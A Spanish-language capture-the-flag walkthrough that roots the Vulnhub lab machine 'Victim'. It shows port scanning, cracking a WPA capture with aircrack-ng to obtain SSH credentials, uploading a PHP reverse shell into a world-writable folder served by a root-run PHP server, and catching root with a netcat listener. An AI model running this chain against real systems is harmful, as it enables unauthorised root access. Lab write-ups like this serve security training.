[VLN] Victim

Hoy vamos a hackear la maquina de Vulnhub llamada Victim. Podeis descargarla desde el siguiente enlace: Victim

Video

Enumeration

Empezamos con un nmap para ver que puertos tiene abiertos. 

sml@Cassandra:~$ nmap -A -p- 192.168.1.79
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-07 13:08 CEST
Nmap scan report for 192.168.1.79
Host is up (0.0023s latency).
Not shown: 65530 filtered ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 
2.0)
| ssh-hostkey: 
|   2048 ea:e8:15:7d:8a:74:bc:45:09:76:34:13:2c:d8:1e:62 (RSA)
|   256 51:75:37:23:b6:0f:7d:ed:61:a0:61:18:21:89:35:5d (ECDSA)
|_  256 7d:36:08:ba:91:ef:24:9f:7b:24:f6:64:c7:53:2c:b0 (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 403 Forbidden
8080/tcp open  http    BusyBox httpd 1.13
|_http-title: 404 Not Found
8999/tcp open  http    WebFS httpd 1.21
|_http-server-header: webfs/1.21
|_http-title: 0.0.0.0:8999/
9000/tcp open  http    PHP cli server 5.5 or later (PHP 7.2.30-1)
|_http-title: Uncaught Exception: MissingDatabaseExtensionException
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 146.45 seconds
Despues de mirar los puertos abiertos, visitamos el siguiente enlace: http://192.168.1.79:8999/ Podemos ver que hay un archivo, que por el nombre y la extension indica que es una captura de paquetes de red,y posiblemente algo relacionado con WPA: http://192.168.1.79:8999/WPA.cap Nos descargamos el fichero, y lo crackeamos: 

sml@Cassandra:~/Descargas$ aircrack-ng WPA-01.cap -w /home/sml/rockyou.txt
[00:00:07] 70679/14344392 keys tested (10580.06 k/s) 

      Time left: 22 minutes, 29 seconds                          0.49%

                       Current passphrase: p4ssword                   
                           KEY FOUND! [ p4ssword ]
Abrimos el fichero con Wireshark y vemos que el SSID es "dlink" Nos logueamos usando el SSID como nombre de usuario, y la password que acabamos de crackear (dlink/p4ssword).

Low Shell


sml@Cassandra:~$ ssh dlink@192.168.1.79
The authenticity of host '192.168.1.79 (192.168.1.79)' can't be established.
ECDSA key fingerprint is SHA256:rlY5QcLGFoLjkoNzEVHA0e3fVUALcYpJ3l9rqJRyPCY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.79' (ECDSA) to the list of known hosts.
dlink@192.168.1.79's password: 
Last login: Tue Apr  7 23:36:49 2020 from 192.168.86.99
Miramos los procesos que se estan ejecutando para ver si hay alguno interesante. 

dlink@victim01:~$ ps aux
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.4 159668  8812 ?        Ss   11:07   0:01 /sbin/init 
maybe-ubiquity
root         2  0.0  0.0      0     0 ?        S    11:07   0:00 [kthreadd]
root         4  0.0  0.0      0     0 ?        I<   11:07   0:00 [kworker/0:0H]
root         6  0.0  0.0      0     0 ?        I<   11:07   0:00 [mm_percpu_wq]
root         7  0.1  0.0      0     0 ?        S    11:07   0:04 [ksoftirqd/0]
root         8  0.0  0.0      0     0 ?        I    11:07   0:03 [rcu_sched]
root         9  0.0  0.0      0     0 ?        I    11:07   0:00 [rcu_bh]
root        10  0.0  0.0      0     0 ?        S    11:07   0:00 [migration/0]
root        11  0.0  0.0      0     0 ?        S    11:07   0:00 [watchdog/0]
root        12  0.0  0.0      0     0 ?        S    11:07   0:00 [cpuhp/0]
root        13  0.0  0.0      0     0 ?        S    11:07   0:00 [kdevtmpfs]
root        14  0.0  0.0      0     0 ?        I<   11:07   0:00 [netns]
root        15  0.0  0.0      0     0 ?        S    11:07   0:00 
[rcu_tasks_kthre]
root        16  0.0  0.0      0     0 ?        S    11:07   0:00 [kauditd]
root        17  0.0  0.0      0     0 ?        S    11:07   0:00 [khungtaskd]
root        18  0.0  0.0      0     0 ?        S    11:07   0:00 [oom_reaper]
root        19  0.0  0.0      0     0 ?        I<   11:07   0:00 [writeback]
root        20  0.0  0.0      0     0 ?        S    11:07   0:00 [kcompactd0]
root        21  0.0  0.0      0     0 ?        SN   11:07   0:00 [ksmd]
root        22  0.0  0.0      0     0 ?        SN   11:07   0:00 [khugepaged]
root        23  0.0  0.0      0     0 ?        I<   11:07   0:00 [crypto]
root        24  0.0  0.0      0     0 ?        I<   11:07   0:00 [kintegrityd]
root        25  0.0  0.0      0     0 ?        I<   11:07   0:00 [kblockd]
root        26  0.0  0.0      0     0 ?        I<   11:07   0:00 [ata_sff]
root        27  0.0  0.0      0     0 ?        I<   11:07   0:00 [md]
root        28  0.0  0.0      0     0 ?        I<   11:07   0:00 [edac-poller]
root        29  0.0  0.0      0     0 ?        I<   11:07   0:00 [devfreq_wq]
root        30  0.0  0.0      0     0 ?        I<   11:07   0:00 [watchdogd]
root        34  0.0  0.0      0     0 ?        S    11:07   0:00 [kswapd0]
root        35  0.0  0.0      0     0 ?        I<   11:07   0:00 [kworker/u3:0]
root        36  0.0  0.0      0     0 ?        S    11:07   0:00 
[ecryptfs-kthrea]
root        78  0.0  0.0      0     0 ?        I<   11:07   0:00 [kthrotld]
root        79  0.0  0.0      0     0 ?        I<   11:07   0:00 
[acpi_thermal_pm]
root        80  0.0  0.0      0     0 ?        S    11:07   0:00 [scsi_eh_0]
root        81  0.0  0.0      0     0 ?        I<   11:07   0:00 [scsi_tmf_0]
root        82  0.0  0.0      0     0 ?        S    11:07   0:00 [scsi_eh_1]
root        83  0.0  0.0      0     0 ?        I<   11:07   0:00 [scsi_tmf_1]
root        89  0.0  0.0      0     0 ?        I<   11:07   0:00 [ipv6_addrconf]
root        98  0.0  0.0      0     0 ?        I<   11:07   0:00 [kstrp]
root       115  0.0  0.0      0     0 ?        I<   11:07   0:00 
[charger_manager]
root       177  0.0  0.0      0     0 ?        I<   11:07   0:00 [kworker/0:1H]
root       195  0.0  0.0      0     0 ?        S    11:07   0:00 [scsi_eh_2]
root       196  0.0  0.0      0     0 ?        I<   11:07   0:00 [scsi_tmf_2]
root       197  0.0  0.0      0     0 ?        I<   11:07   0:00 [ttm_swap]
root       198  0.0  0.0      0     0 ?        S    11:07   0:00 [irq/18-vmwgfx]
root       269  0.0  0.0      0     0 ?        I<   11:07   0:00 [raid5wq]
root       322  0.0  0.0      0     0 ?        S    11:07   0:00 [jbd2/sda2-8]
root       323  0.0  0.0      0     0 ?        I<   11:07   0:00 
[ext4-rsv-conver]
root       331  0.0  0.5 315672 11816 ?        Ss   12:05   0:00 php -S 
0.0.0.0:9000 -t /var/www/bolt/public/
root       397  0.0  0.0      0     0 ?        I<   11:07   0:00 [iscsi_eh]
root       407  0.0  0.0      0     0 ?        I<   11:07   0:00 [ib-comp-wq]
root       408  0.0  0.0      0     0 ?        I<   11:07   0:00 
[ib-comp-unb-wq]
root       409  0.0  0.0      0     0 ?        I<   11:07   0:00 [ib_mcast]
root       410  0.0  0.0      0     0 ?        I<   11:07   0:00 [ib_nl_sa_wq]
root       411  0.0  0.0      0     0 ?        I<   11:07   0:00 [rdma_cm]
root       420  0.0  0.2  46764  5464 ?        Ss   11:07   0:00 
/lib/systemd/systemd-udevd
root       422  0.0  0.0  97708  1680 ?        Ss   11:07   0:00 /sbin/lvmetad 
-f
dlink      453  0.0  0.1  34404  2808 pts/0    R+   12:10   0:00 ps aux
systemd+   461  0.0  0.1 141936  3192 ?        Ssl  11:08   0:00 
/lib/systemd/systemd-timesyncd
root       511  0.0  0.0      0     0 ?        I<   11:08   0:00 
[iprt-VBoxWQueue]
systemd+   680  0.0  0.2  80180  5596 ?        Ss   11:08   0:00 
/lib/systemd/systemd-networkd
systemd+   702  0.2  0.2  70640  4948 ?        Ss   11:08   0:08 
/lib/systemd/systemd-resolved
root       774  0.0  0.8 169104 16800 ?        Ssl  11:08   0:00 
/usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root       775  0.0  0.4 434332  9532 ?        Ssl  11:08   0:00 
/usr/sbin/ModemManager --filter-policy=strict
daemon     777  0.0  0.1  28332  2048 ?        Ss   11:08   0:00 /usr/sbin/atd 
-f
root       778  0.0  0.1  30028  2888 ?        Ss   11:08   0:00 /usr/sbin/cron 
-f
message+   780  0.0  0.2  50264  4484 ?        Ss   11:08   0:00 
/usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile 
--systemd-activation --syslog-
root       802  0.0  0.1  57400  2984 ?        S    11:08   0:00 /usr/sbin/CRON 
-f
root       822  0.0  0.0   4628   832 ?        Ss   11:08   0:00 /bin/sh -c 
sleep 30 && /var/www/bolt/public/bolt_start.sh
root       833  0.0  0.2  45248  5360 ?        Ss   11:08   0:00 
/sbin/wpa_supplicant -u -s -O /run/wpa_supplicant
root       834  0.0  0.6 405488 13636 ?        Ssl  11:08   0:00 
/usr/sbin/NetworkManager --no-daemon
root       845  0.0  0.2  62148  5756 ?        Ss   11:08   0:00 
/lib/systemd/systemd-logind
root       846  0.0  0.3 288532  6828 ?        Ssl  11:08   0:00 
/usr/lib/accountsservice/accounts-daemon
root       851  0.0  0.0 621536  1820 ?        Ssl  11:08   0:01 /usr/bin/lxcfs 
/var/lib/lxcfs/
syslog     853  0.0  0.1 263036  4032 ?        Ssl  11:08   0:00 
/usr/sbin/rsyslogd -n
root       854  0.0  1.1 639292 23552 ?        Ssl  11:08   0:00 
/usr/lib/snapd/snapd
root       905  0.0  0.3 288884  6288 ?        Ssl  11:08   0:00 
/usr/lib/policykit-1/polkitd --no-debug
root       954  0.0  0.9 185944 19008 ?        Ssl  11:08   0:00 
/usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown 
--wait-for-signal
root       986  0.0  1.0 448404 21656 ?        Ssl  11:08   0:02 
/usr/bin/python3 /usr/bin/fail2ban-server -xf start
root      1112  0.0  0.2  72300  5952 ?        Ss   11:08   0:00 /usr/sbin/sshd 
-D
root      1113  0.0  0.0  14888  1688 tty1     Ss+  11:08   0:00 /sbin/agetty 
-o -p -- \u --noclear tty1 linux
mysql     1158  0.0  8.7 1162256 178652 ?      Sl   11:08   0:02 
/usr/sbin/mysqld --daemonize --pid-file=/run/mysqld/mysqld.pid
www-data  1169  0.0  0.1  43444  2372 ?        Ss   11:08   0:00 
/usr/bin/webfsd -k /var/run/webfs/webfsd.pid -r /var/www/html -n victim01 -i 
0.0.0.0 -p 8999 -u www-
root      1321  0.0  1.9 480416 40688 ?        Ss   11:08   0:00 
/usr/sbin/apache2 -k start
www-data  1348  0.2  1.9 483452 38824 ?        S    11:08   0:07 
/usr/sbin/apache2 -k start
www-data  1349  0.2  2.0 483456 41312 ?        S    11:08   0:08 
/usr/sbin/apache2 -k start
root      1415  0.0  0.0   4628   760 ?        S    11:08   0:00 /bin/sh 
/var/www/bolt/public/bolt_start.sh
root      1417 26.0  1.6 315672 33076 ?        S    11:08  16:03 php -S 
0.0.0.0:9000 -t /var/www/bolt/public/
root      1418  0.1  0.0   5140   472 ?        Ss   11:08   0:05 busybox httpd 
-p 0.0.0.0:8080 -h /home/victim01
www-data  1592  0.2  1.9 483316 38932 ?        S    11:10   0:07 
/usr/sbin/apache2 -k start
www-data  1595  0.2  1.7 483120 36688 ?        S    11:10   0:07 
/usr/sbin/apache2 -k start
www-data  1596  0.2  1.8 483120 36748 ?        S    11:10   0:07 
/usr/sbin/apache2 -k start
www-data  1597  0.2  1.9 483452 40464 ?        S    11:10   0:07 
/usr/sbin/apache2 -k start
www-data  1598  0.2  1.9 483452 39116 ?        S    11:10   0:07 
/usr/sbin/apache2 -k start
www-data  1785  0.1  1.8 483256 36884 ?        S    11:11   0:05 
/usr/sbin/apache2 -k start
www-data  1786  0.1  1.8 483120 36748 ?        S    11:11   0:05 
/usr/sbin/apache2 -k start
www-data  1789  0.1  1.9 483452 38860 ?        S    11:11   0:05 
/usr/sbin/apache2 -k start
dlink    31042  0.0  0.1  74656  3292 ?        S    11:52   0:00 sshd: 
dlink@pts/0
dlink    31043  0.0  0.2  19960  4656 pts/0    Ss   11:52   0:00 -bash
Vemos que el siguiente proceso esta lanzado como root: root 1417 26.0 1.6 315672 33076 ? S 11:08 16:03 php -S 0.0.0.0:9000 -t /var/www/bolt/public/ Comprobamos si podemos escribir en alguna de sus carpetas. 

dlink@victim01:~$ ls -l /var/www/bolt/public/     
total 28
drwxr-xr-x 6 root root 4096 Nov 12 17:23 bolt-public
-rwxr-xr-x 1 root root   45 Apr  7 22:01 bolt_start.sh
drwxr-xr-x 2 root root 4096 Aug 25  2018 extensions
drwxrwxrwx 2 root root 4096 May  7 12:05 files
-rw-r--r-- 1 root root  295 Aug 25  2018 index.php
drwxr-xr-x 5 root root 4096 Nov 12 17:23 theme
drwxr-xr-x 2 root root 4096 Aug 25  2018 thumbs
Vemos que en la carpeta /var/www/bolt/public/files tenemos permiso de escritura.

Privilege Escalation

Preparamos una reverse-shell en php para ponerla en /var/www/bolt/public/files y asi obtener una shell de root. 

sml@Cassandra~$ cp /usr/share/webshells/php/php-reverse-shell.php  webshell.php
Editamos la shell y modificamos los valores para poner nuestra IP y puerto. Una vez modificada, la copiamos a la maquina victima. 

sml@Cassandra:~$ scp webshell.php dlink@192.168.1.79:/var/www/bolt/public/files
dlink@192.168.1.79's password: 
webshell.php
sml@Cassandra:~$ nc -nlvp 5555
Accedemos a: http://192.168.1.79:9000/files/webshell.php 

sml@Cassandra:~$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.1.148] from (UNKNOWN) [192.168.1.79] 41524
Linux victim01 4.15.0-96-generic #97-Ubuntu SMP Wed Apr 1 03:25:46 UTC 2020 
x86_64 x86_64 x86_64 GNU/Linux
 12:05:49 up 57 min,  1 user,  load average: 0.00, 0.00, 0.09
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
dlink    pts/0    192.168.1.148    11:52    1:32   0.30s  0.30s -bash
uid=0(root) gid=0(root) groups=0(root)
/bin/sh: 0: can't access tty; job control turned off
# whoami
root

flag.txt


# cd /root
# ls
flag.txt
snap
# cat flag.txt  
Nice work!

                .:##:::.
              .:::::/;;\:.
        ()::::::@::/;;#;|:.
        ::::##::::|;;##;|::
         ':::::::::\;;;/::'
              ':::::::::::
               |O|O|O|O|O|O
               :#:::::::##::.
              .:###:::::#:::::.
              :::##:::::::::::#:.
               ::::;:::::::::###::.
               ':::;::###::;::#:::::
                ::::;::#::;::::::::::
                :##:;::::::;::::###:::     .
              .:::::; .:::##::::::::::::::::
              ::::::; :::::::::::::::::##::  #rootdance